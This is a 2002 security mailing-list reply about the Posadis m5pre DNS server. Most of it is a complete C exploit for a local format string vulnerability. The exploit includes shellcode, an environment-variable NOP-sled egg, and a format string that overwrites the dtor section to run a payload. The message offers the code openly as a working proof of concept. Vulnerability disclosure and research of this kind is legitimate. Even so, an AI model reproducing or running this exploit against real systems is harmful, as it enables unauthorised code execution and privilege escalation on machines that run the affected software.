Re: bufferoverflow posadis m5pre - ( POC number 2 )

From: KF (dotslash@snosoft.com)
Date: 04/17/02 

Date: Wed, 17 Apr 2002 13:58:57 -0400
From: KF <dotslash@snosoft.com>
To: eSDee <eSDee@netric.org>

We have been working on this issue for a while but have yet to exploit
it remotely. The posadis binary is not suid root by default if I
remember correctly... from my research on the issue I thought that it
may be possible to exploit this issue using a feature called "Hint
domains" but I have not been able to test this theory. Here is what we
came up with for the exploitation of the local binary ... I was holding
on to it until I worked out the remote exploitation but there is no
point now. =]

-KF

eSDee wrote:

>
>Netric Security Team - http://www.netric.org
>by eSDee
>
>Posadis m5pre2
>Type: Stackoverflow
>Priority: 2
>
...

/*
 * Posadis m5pre1 DNS local format string exploit.
 *
 * The exploitation research was provided by KF / Snosoft (http://www.snosoft.com)
 * Original hole was found by KKR of (http://dekode.org)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical Difficulties -
 *
 * 1). Posadis messes with the bytes-written-so-far part, therefor an exact
 * address cannot be written, it will be off around 20 bytes from the
 * address you specify.
 * 2). STRANGELY, execve("/bin/sh", "sh", 0); will fail! (no error or anything, * i checked with gdb, i get a SIGTRAP as it supposes but the code will not * be executed. A shellcode that does execve("/tmp/p00p", "p00p", 0) did
 * work. p00p is just a simple bash script.
 */

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define EGGSIZE 2048

/* execve /tmp/p00p (courtesy of zillion), see /tmp/p00p */

char shellcode[] =
        "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
        "\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
        "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
        "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";

int main(int argc, char *argv[])
{
        char *fmt;
        char egg[EGGSIZE];
        unsigned long smashaddr = 0x08063d14; /* overwrite (dtor section) */
        char splitaddr0, splitaddr1, splitaddr2, splitaddr3;

        splitaddr0 = (smashaddr & 0xff000000) >> 24;
        splitaddr1 = (smashaddr & 0x00ff0000) >> 16;
        splitaddr2 = (smashaddr & 0x0000ff00) >> 8;
        splitaddr3 = (smashaddr & 0x000000ff);

        if(!(fmt = malloc(256))) {printf("malloc()\n"); exit(-1);}

        memset(fmt, 0x00, 256);
        memset(egg, 0x00, EGGSIZE);

        memset (egg, NOP, EGGSIZE - strlen (shellcode));
        memcpy (egg + EGGSIZE - strlen (shellcode) - 1, shellcode,
                strlen (shellcode));

        sprintf(fmt,"AAA%c%c%c%c%c%c%c%c%%.49095u%%21$hn%%.15116u%%20$hn",
                splitaddr3, splitaddr2, splitaddr1, splitaddr0,
                splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0);

        egg[EGGSIZE -1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);

        execl("/home/posadis-m5pre1/src/posadis", "posadis", fmt, NULL);
        return 0;
}